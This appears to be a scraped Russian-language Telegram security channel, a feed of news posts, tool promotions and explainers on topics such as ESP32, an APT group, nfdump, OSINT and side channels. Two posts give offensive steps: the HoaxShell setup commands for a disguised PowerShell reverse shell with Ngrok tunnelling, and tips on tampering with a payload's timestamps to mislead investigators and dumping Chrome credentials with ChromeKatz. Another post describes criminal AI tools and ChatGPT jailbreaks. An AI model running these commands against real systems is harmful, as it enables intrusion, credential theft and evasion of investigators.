Как найти и потерять бэкдор в ESP32
В марте скромная плата ESP32 внезапно оказалась в центре целого скандала. СМИ писали о «бэкдоре в миллиарде устройств», а юзеры обсуждали захват умных ламп и чайников. Но уже через неделю была тишина. Что же на самом деле нашли испанские исследователи, и был ли это бэкдор?
⏺ В статье вся история: от зала конференции в Мадриде до CVE-записи и официального опровержения. Простым языком о низкоуровневом Bluetooth, «золотом бинарнике» и том, как PR в ИБ порой громче самой уязвимости.
ZeroDay | #Статья
В марте скромная плата ESP32 внезапно оказалась в центре целого скандала. СМИ писали о «бэкдоре в миллиарде устройств», а юзеры обсуждали захват умных ламп и чайников. Но уже через неделю была тишина. Что же на самом деле нашли испанские исследователи, и был ли это бэкдор?
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14❤4😁3
Искусственный интеллект — главный защитник против кибермошенников.
Сегодня сфера киберпреступлений является одной из самых опасных угроз, и без использования искусственного интеллекта победить его невозможно. Об этом рассказал зампред правления Сбера Станислав Кузнецов в рамках своего выступления на ПМЮФ.
⏺ Он заявил, что в ближайшие два года Ai-технологии помогут сократить убытки от мошенничества на 70%. Но главная цель — это 80% телефонных мошенников, которых ИИ будет выявлять до того, как пользователь ответит на звонок, к 2026 году.
ZeroDay | #Безопасность
Сегодня сфера киберпреступлений является одной из самых опасных угроз, и без использования искусственного интеллекта победить его невозможно. Об этом рассказал зампред правления Сбера Станислав Кузнецов в рамках своего выступления на ПМЮФ.
ZeroDay | #Безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
🤡18👍7❤3🤔3💯2🤣2🔥1🙈1
This media is not supported in your browser
VIEW IN TELEGRAM
APTRS: автоматизация отчётов пентестера без боли
👋
⏺ APTRS — автоматизация, которая реально экономит время. Тут вместо ручной сборки отчётов: просто ведёте проект, отмечаете найденные уязвимости, а остальное делает система. Генерация отчётов, дашборд для клиента, шаблоны под ваш стиль - всё уже встроено.
⏺ Чем цепляет: по сути, это пентест-CRM с кнопкой “Собрать отчёт”. Загружаете PoC, описания, рекомендации, отмечаете, что пофикшено — и готово. Не нужно копировать текст между документами, править вручную или держать десятки таблиц. Установка — через docker-compose, в демку можно зайти прямо сейчас.
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11
This media is not supported in your browser
VIEW IN TELEGRAM
Приветствую в мире цифровой безопасности!
Сделал для вас новую подборку крутых подкастов по ИБ и не только. В этот раз они будут англоязычные.
ZeroDay | #Подборка
Please open Telegram to view this post
VIEW IN TELEGRAM
✍11❤2👎1👀1
This media is not supported in your browser
VIEW IN TELEGRAM
Мониторим трафик в Linux с nfdump
👋
⏺ Установка и сбор данных с nfdump: nfdump - удобный тул для сбора и анализа NetFlow/IPFIX данных. Сначала установим и запустим nfdump:
Затем настроим nfacctd.conf для приёма NetFlow с вашего маршрутизатора или коммутатора. Например:
⏺ Анализ и фильтрация потоков: а вот полученные данные можно смотреть через консоль:
Для поиска трафика с подозрительных IP или портов:
⏺ Экспорт и интеграция с SIEM: nfdump умеет выгружать данные в CSV или JSON, которые уже потом легко можно отправить в вашу SIEM систему для анализа и корреляции:
Или через cron запускать регулярный экспорт для автоматизации.
ZeroDay | #безопасность
Приветствую в мире цифровой безопасности!
Сегодня расскажу о легкой настройке мониторинга сетевых соединений в Linux с помощью nfdump и NetFlowsudo apt install nfdump
sudo systemctl start nfacctd
Затем настроим nfacctd.conf для приёма NetFlow с вашего маршрутизатора или коммутатора. Например:
[collector1]
bind = 0.0.0.0
port = 2055
nfdump -r /var/log/nfdump/currentfile
Для поиска трафика с подозрительных IP или портов:
nfdump -r /var/log/nfdump/currentfile "dst port 22 or src ip 192.168.1.5"
nfdump -r /var/log/nfdump/currentfile -o csv > flows.csv
Или через cron запускать регулярный экспорт для автоматизации.
ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤3😱1🤮1
Преступный ИИ уже существует, и он доступен любому
То, что раньше требовало опыта и кучи навыков, теперь умеет делать Xanthorox - это перый полноценный ИИ-преступник. Никаких даркнетов и сложных паролей - всё легко: YouTube, Telegram, Discord и интерфейс как у ChatGPT. Вводите запрос и получаете фишинг, дипфейки или вымогатель.
⏺ В статье о том, как от джейлбрейков ChatGPT мы дошли до WormGPT и целой армии преступных ИИ. Расскажут, как школьники запускают тысячи атак, и почему самая большая угроза - это массовое мошенничество, а не ядерные бомбы.
Короче, ИБшникам напрячься😬
ZeroDay | #Статья
То, что раньше требовало опыта и кучи навыков, теперь умеет делать Xanthorox - это перый полноценный ИИ-преступник. Никаких даркнетов и сложных паролей - всё легко: YouTube, Telegram, Discord и интерфейс как у ChatGPT. Вводите запрос и получаете фишинг, дипфейки или вымогатель.
Короче, ИБшникам напрячься
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11🤣6👍5🥰4
Какой механизм защиты от атак типа buffer overflow использует случайную расстановку адресов в памяти?
Anonymous Quiz
26%
Stack Canaries
21%
DEP
35%
ASLR
18%
ROP
🔥9
This media is not supported in your browser
VIEW IN TELEGRAM
HoaxShell: обратный шелл в маске веб-трафика
👋
⏺ Что за инструмент: HoaxShell генерит PowerShell-пейлоады с подстроенными под реальные веб-запросы URL и хитрыми HTTP-заголовками, а шифрование и поддержка HTTPS делают их похожими на обычный браузерный трафик. Если связь прервётся - сессия легко восстановится
⏺ Чем крут: не тупо обратный шелл - это такой виртуальный хамелеон в сети. Его сложно заметить и еще сложнее заблокировать, а настройка очень и очень легкая, а значит позволяет быстро адаптировать его под любую ситуацию.
⏺ Как начать: Разворачиваете сервер, генерируете пейлоад с нужными параметрами и запускаете на целевой машине — и всё, связь установлена и маскирована под обычный веб-трафик.
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14❤6
This media is not supported in your browser
VIEW IN TELEGRAM
Настроим PowerShell через HTTP с помощью Hoaxshell
👋
⏺ Установка: Ставится легко — обычный git и pip:
⏺ Базовое подключение: Запускаем сервер на вашей машине:
Сгенерируется PowerShell-пейлоад, готовый к запуску на машине.
⏺ Хотите меньше палиться: Подставляем стандартный HTTP-заголовок, чтобы не ловиться на сигнатуры:
Можно ещё подгрузить свой .ps1:
А если потеряли сессию - восстанавливаем:
⏺ HTTPS и туннели: Есть поддержка HTTPS с самоподписанным или валидным сертификатом, а ещё - возможность прокинуть через Ngrok или LocalTunnel:
⏺ И да кстати, интерактивные команды (типа powershell или cmd.exe) могут подвесить сессию. Всё, что нужно - запускать команды напрямую, не открывая консоль внутри консоли. Например:
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!А теперь разберем, как работать с инструментом из прошлого поста git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
sudo python3 hoaxshell.py -s <your_ip>
Сгенерируется PowerShell-пейлоад, готовый к запуску на машине.
sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"
Можно ещё подгрузить свой .ps1:
sudo python3 hoaxshell.py -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"
А если потеряли сессию - восстанавливаем:
sudo python3 hoaxshell.py -s <your_ip> -g
sudo python3 hoaxshell.py -ng # через Ngrok
sudo python3 hoaxshell.py -lt # через LocalTunnel
cmd /c whoami
powershell echo 'Test'
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14❤2
Lotus Panda: взломы госструктур ЮВА
👋
⏺ Группа Lotus Panda атаковала госструктуры и авиасектор в Юго-Восточной Азии с августа 2024 по февраль 2025. Под удар попали министерства, авиадиспетчеры, телеком и СМИ.
⏺ Как атакуют: Хакеры юзают легальные .exe от Trend Micro и Bitdefender, чтобы загружать вредоносные DLL. Основной инструмент - обновлённый Sagerunex для сбора и кражи данных. Также в ход идут reverse SSH и утилиты ChromeKatz/CredentialKatz, вытаскивающие куки и пароли из Chrome.
⏺ Маскировка и обход анализа: Для скрытности используют легальные тулзы: Zrok (удалённый доступ к внутренним сервисам) и
⏺ Что важно: Lotus Panda вообще не новички. С 2009 года они атакуют правительства, дипломатов и армию. Их стиль - это фишинг, эксплойты, легальный софт. Кампания показывает, что они продолжают развивать инструменты и расширяют зону охвата.
ZeroDay | #безопасность
Приветствую в мире цифровой безопасности!Расскажу о APT-группировке Lotus-Panda.datechanger.exe (подмена таймстемпов). Это мешает аналитикам отследить точку входа, которая, кстати, до сих пор не найдена.ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤4🤯2😎1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга
👋
⏺ Zrok: легальный способ попасть во внутреннюю сеть: это инструмент от OpenZiti для шаринга локального сервиса через P2P-туннель. Используется даже легально в CI/CD, но в пентесте позволяет “протянуть” доступ к хосту без открытых портов.
⏺ datechanger.exe — запутываем аналитиков: Меняем таймстемпы файлов, чтобы затруднить расследование инцидента. Особенно полезно после дропа и запуска payload’а.
⏺ ChromeKatz: воровство куков и паролей в одну команду: Развитие идеи Mimikatz, но для браузера. Извлекает логины, куки и токены прямо из Chrome-профиля.
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу о трех полезных фишках про пентесте.
zrok enable public --backed-by tcp --frontend-url tcp://:8080
# и получаем внешний endpoint
datechanger.exe -modify 01/01/2017 payload.exe
ChromeKatz.exe -dump
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15👍3🔥3
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16❤7👍6👎4
Как мессенджеры шифруют сообщения (end-to-end) на самом деле
То, что кажется магией в WhatsApp или Signal, на самом деле просто: пара ключей, немного математики и алгоритм ECDH. Вы пишете «Привет», и никто, кроме собеседника, не может это прочитать, даже сервер мессенджера.
⏺ В статье расскажут, как работает сквозное шифрование: от публичного и приватного ключа до симметричного shared secret, который нигде не хранится, но всегда создаётся заново. Показывают, как это устроено в браузере с Web Crypto API - прямо как у больших мессенджеров.
ZeroDay | #Статья
То, что кажется магией в WhatsApp или Signal, на самом деле просто: пара ключей, немного математики и алгоритм ECDH. Вы пишете «Привет», и никто, кроме собеседника, не может это прочитать, даже сервер мессенджера.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
😁15❤5💩4❤🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
BlackBird: массовый OSINT-поиск на 600 сайтах
👋
⏺ Что это: BlackBird — OSINT-инструмент, который прочёсывает ~600 сайтов в поисках заданного ника. Соцсети, платформы, маргинальные форумы - если человек где-то светился под этим именем, вы об этом узнаете.
⏺ В чём крутость: Это не браузерный кликер. BlackBird работает асинхронно, сразу стреляя пачкой HTTP-запросов.
На каждый запуск тут новый user-agent (а в пуле их больше тысячи), чтобы не словить бан.
Все шаблоны проверок — в data.json.
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.На каждый запуск тут новый user-agent (а в пуле их больше тысячи), чтобы не словить бан.
Все шаблоны проверок — в data.json.
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍7😁2
Злоумышленники провели атаку «отравленными» адресами: отправили «пыль» (1.01 USDT) с кошелька, похожего на адрес контрагента жертвы.
Через минуту после пробной транзакции, пользователь получил «пыль» с фальшивого кошелька, копирующего оригинальный адрес в начале и в конце. Не проверив символы, он отправил $129 млн… прямо в руки мошенника.
Будьте в курсе сомнительных схем. На канале КоинКит — экспертные разборы, расследования и рекомендации по защите активов.
А еще обезопась себя с промокодом
Оставайтесь в безопасности с @coinkyt!
Please open Telegram to view this post
VIEW IN TELEGRAM
😁16❤5👍3👎2🔥2👏1
Боковые каналы: утечка данных без взлома
👋
⏺ Что это вообще такое: Это способ получить инфу не из самой системы, а из побочных эффектов её работы. Шум, электромагнитное излучение, время выполнения - всё это может выдать секреты.
Посмотрим на примеры таких атак:
1️⃣ Время отклика — сравнение задержек при обработке разных запросов помогает понять, какие данные лежат в памяти. Так работал [Timing Attack на TLS].
2️⃣ Энергопотребление — анализ колебаний напряжения в смарткартах позволял узнать зашифрованные PIN-коды.
3️⃣ Акустика — звук нажатий на клавиатуру позволяет восстановить вводимый текст с точностью до 90%.
4️⃣ Cache timing — атаки вроде Spectre и Meltdown используют особенности архитектуры CPU, чтобы читать память между процессами.
⏺ Чем опасно: Даже без доступа к системе можно получить приватную инфу. Часто такие атаки не логируются, а значит остаются незамеченными.
⏺ Можно ли защититься: Полностью - сложно, но можно снизить риск: делают алгоритмы с одинаковым временем выполнения, рандомизируют работу (например, вставляя шум или задержки), ограничивают физический доступ и учитывают такие атаки на этапе threat modeling.
ZeroDay | #sidechannel
Приветствую в мире цифровой безопасности!Поговорим о не банальном векторе атаки - side-channel attacks.Посмотрим на примеры таких атак:
ZeroDay | #sidechannel
Please open Telegram to view this post
VIEW IN TELEGRAM
❤20🤔1